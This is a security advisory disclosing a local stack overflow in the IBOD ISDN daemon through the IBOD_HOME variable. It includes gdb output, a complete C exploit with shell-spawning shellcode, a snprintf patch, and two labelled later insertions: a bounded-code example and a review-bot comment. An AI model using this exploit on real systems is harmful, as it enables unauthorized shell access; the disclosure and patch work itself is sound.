
10 - IBOD/XIBOD 1.5.0 and prior Local Buffer Overflow Vulnerability

No System Group - Advisory #10 - 19/12/04

  • Program: IBOD/XIBOD ISDN Bandwidth On Demand Daemon
  • Homepage: http://www.datenwelt.net/oss/ibod/
  • Vulnerable Versions: IBOD/XIBOD 1.5.0 and prior
  • Risk: Low
  • Impact: Local Stack Buffer Overflow Vulnerability

DESCRIPTION

Ibod is a daemon program for GNU/Linux that constantly monitors the ISDN interface for inbound and outbound traffic throughput. It was originally written by Björn Smith at Compound Systems AB.

More information at: http://www.datenwelt.net/oss/ibod/

DETAILS

Ibod is affected by a stack buffer overflow in the setattr() function: more than 512 bytes can be written into the 512-byte 'config_filename' buffer, because the value of IBOD_HOME is copied into it with an unbounded sprintf():

--- ibod.c ---
    channels_last = -1;

    /* Find out where to look for configuration file */
    if ((home = getenv("IBOD_HOME")) == NULL)    // <--- check this
        home = IBOD_DEFAULT_DIR;

    /* Setup initial attributes */
    if (setattr(home) == -1) {
        closelog();
        exit(1);
    }

...

    /* Open config file */
    sprintf(config_filename, "%s/ibod.cf", home);    // <--- the bug
    if ((fd = fopen(config_filename, "r")) == NULL) {

        syslog(LOG_ERR, "%s: %s\n", config_filename, strerror(errno));
        return -1;
    }

    /* Loop over the config file to setup attributes */
    while (fgets(linebuf, MAX_STR_LEN, fd) != NULL) {

        if (*linebuf == '#')    /* Ignore comments */
            continue;
--- ibod.c ---
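For comparison, here is a bounded version of the same path construction. This is an added example, not code from the advisory or from ibod itself: where setattr() calls sprintf() into the 512-byte buffer, this checks snprintf()'s return value and refuses an oversized IBOD_HOME instead of overflowing or silently truncating. MAX_STR_LEN and IBOD_DEFAULT_DIR are assumed values chosen for the demonstration.

```c
/* Added example (not from the advisory or from ibod): bounded construction of
 * "<home>/ibod.cf". The original does sprintf(config_filename, "%s/ibod.cf", home)
 * into a 512-byte buffer with no length check. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_STR_LEN 512               /* assumed: size of config_filename in ibod.c */
#define IBOD_DEFAULT_DIR "/etc/ibod"  /* placeholder for ibod's real default directory */

/* Build "<home>/ibod.cf" into out (capacity outsz).
 * Returns 0 on success, -1 if the result would not fit (out is then ""). */
int build_config_path(char *out, size_t outsz, const char *home)
{
    int n = snprintf(out, outsz, "%s/ibod.cf", home);
    if (n < 0 || (size_t)n >= outsz) {
        /* snprintf would have truncated: fail loudly instead of using a wrong path */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Mirrors ibod's startup logic: use IBOD_HOME if set, otherwise the default dir.
 * The environment value is passed in (what getenv("IBOD_HOME") would return)
 * so the function can be exercised without touching the process environment. */
int config_path_for(const char *home_env, char *out, size_t outsz)
{
    const char *home = home_env ? home_env : IBOD_DEFAULT_DIR;
    return build_config_path(out, outsz, home);
}

int main(void)
{
    char config_filename[MAX_STR_LEN];
    char oversized[545];
    memset(oversized, 'A', 544);   /* constructed: the advisory's 544-byte IBOD_HOME value */
    oversized[544] = '\0';

    if (config_path_for("/home/coki/audit", config_filename, sizeof config_filename) == 0)
        printf("ok: %s\n", config_filename);
    if (config_path_for(oversized, config_filename, sizeof config_filename) == -1)
        printf("rejected: IBOD_HOME too long for %zu-byte buffer\n", sizeof config_filename);
    return 0;
}
```

With a 512-byte buffer and the 8-byte "/ibod.cf" suffix, the longest IBOD_HOME that fits is 503 bytes; anything longer is rejected with -1.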

Let's see what happens:

coki@nosystem:~/audit$ export IBOD_HOME=`perl -e 'print "A" x 544'` 
coki@nosystem:~/audit$ ibod
Segmentation fault
coki@nosystem:~/audit$

When more than 512 bytes are stored in IBOD_HOME, the 'config_filename' buffer overflows.
Let's look at it under gdb:

coki@nosystem:~/audit$ gdb ibod
GNU gdb 6.1.1
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) r
Starting program: /home/coki/audit/ibod

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r $eip
eip 0x41414141 0x41414141
(gdb) q
The program is running. Exit anyway? (y or n) y
coki@nosystem:~/audit$

We can see that the EIP is overwritten with 0x41414141.

EXPLOIT

------------------ ibod_bof.c -------------------
/* ibod_bof.c
 *
 * IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept)
 *
 * Tested in Slackware Linux 10.0
 *
 * by CoKi <coki@nosystem.com.ar>
 * No System Group - http://www.nosystem.com.ar
 */

#include <stdio.h>
#include <stdlib.h>     /* exit(), setenv() */
#include <string.h>     /* strlen(), memset() */
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* execl() */

#define BUFFER (540 + 4)

char shellcode[]=
    "\x31\xc0"              /* xor %eax,%eax */
    "\x31\xd2"              /* xor %edx,%edx */
    "\x52"                  /* push %edx */
    "\x68\x2f\x2f\x73\x68"  /* push $0x68732f2f */
    "\x68\x2f\x62\x69\x6e"  /* push $0x6e69622f */
    "\x89\xe3"              /* movl %esp,%ebx */
    "\x52"                  /* push %edx */
    "\x53"                  /* push %ebx */
    "\x89\xe1"              /* movl %esp,%ecx */
    "\xb0\x0b"              /* mov $0xb,%al */
    "\xcd\x80";             /* int $0x80 */

void use(char *program);

int main(int argc, char *argv[]) {

    FILE *file;
    char buf[BUFFER], *path, tmp[BUFFER];
    char *buffer=buf;
    int ret;

    if(argc != 2) use(argv[0]);

    path = argv[1];

    /* Make sure the target binary exists before running it */
    if((file = fopen(path, "r")) == NULL) {
        printf(" Failed to open file!\n");
        exit(1);
    }

    /* Guess where the SHELLCODE environment string ends up near the top of the stack */
    ret = 0xbffffffa - strlen(shellcode) - strlen(path);

    /* Filler followed by the 4-byte return address */
    bzero(buf, sizeof(buf));
    memset(buffer, 'A', BUFFER-4);

    sprintf(tmp, "%s", (char *)&ret);
    strncat(buf, tmp, 4);

    printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n");
    printf(" by CoKi <coki@nosystem.com.ar>\n\n");

    /* IBOD_HOME carries the overflow, SHELLCODE the payload */
    setenv("IBOD_HOME", buf, 1);
    setenv("SHELLCODE", shellcode, 1);

    execl(path, path, NULL);

}

void use(char *program) {
    printf(" Use: %s <path>\n", program);
    exit(1);
}

---------------- ibod_bof.c ------------------

coki@nosystem:~/audit$ make ibod_bof
cc ibod_bof.c -o ibod_bof
coki@nosystem:~/audit$ ./ibod_bof /home/coki/audit/ibod

ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)
by CoKi <coki@nosystem.com.ar>

sh-2.05b$ id
uid=1000(coki) gid=0(root) groups=0(root),11(floppy),17(audio),18(video),19(cdrom)
sh-2.05b$

This exploit does not give a root shell :(

SOLUTIONS

The patch is included here:

--- ibod.c      2001-02-15 07:31:37.000000000 -0300 
+++ ibod.c 2004-12-20 20:56:40.000000000 -0300
@@ -204,7 +204,7 @@ static int setattr(char *home)
cf.max_channels = MAX_CHANNELS;

/* Open config file */
- sprintf(config_filename, "%s/ibod.cf", home);
+ snprintf(config_filename, sizeof(config_filename), "%s/ibod.cf", home);
if ((fd = fopen(config_filename, "r")) == NULL) {
syslog(LOG_ERR, "%s: %s\n", config_filename, strerror(errno));
return -1;
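Review bot: the `+ snprintf(config_filename, sizeof(config_filename), "%s/ibod.cf", home);` line bounds the write but silently truncates when `home` is longer than the buffer allows, so an oversized IBOD_HOME now yields a truncated path that fopen() fails on, and the following syslog() reports that truncated path rather than the real cause. Consider checking snprintf()'s return value (`n < 0 || n >= sizeof(config_filename)`), logging that IBOD_HOME is too long, and returning -1 at that point; the existing `return -1;` path already makes the caller closelog() and exit(1), so the failure mode stays the same but becomes diagnosable.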

REFERENCES

http://www.nosystem.com.ar/advisories/advisory-10.txt

CREDITS

Discovered by CoKi <coki@nosystem.com.ar>

No System Group - http://www.nosystem.com.ar
